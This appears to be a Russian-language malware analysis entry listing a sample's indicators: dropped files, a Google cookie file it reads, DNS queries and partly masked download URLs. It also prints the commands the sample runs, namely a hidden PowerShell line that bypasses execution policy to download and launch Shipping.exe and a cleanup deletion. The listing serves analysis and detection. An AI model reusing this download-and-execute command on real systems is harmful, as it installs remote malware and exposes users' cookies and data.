Техническая информация
- http://ze##nex.com/shipping.exe как %appdata%\shipping.exe
- %WINDIR%\explorer.exe
- iexplore.exe
- Процесс iexplore.exe, модуль wininet.dll
- Процесс firefox.exe, модуль nss3.dll
- %TEMP%\abctfhghghghghВЈ.sct
- %APPDATA%\shipping.exe
- %APPDATA%\microsoft\windows\cookies\user@google[1].txt
- %APPDATA%\shipping.exe
- http://ze##nex.com/Shipping.exe
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
- DNS ASK ze##nex.com
- DNS ASK do#########ocs.googleusercontent.com
- DNS ASK oc##.#tartssl.com
- DNS ASK st####.rapidssl.com
- '%APPDATA%\shipping.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://ze##nex.com/Shipping.exe','%APPDATA%\Shipping.exe');Start-Process '%AP...' (со скрытым окном)
- '%WINDIR%\syswow64\mstsc.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%APPDATA%\Shipping.exe"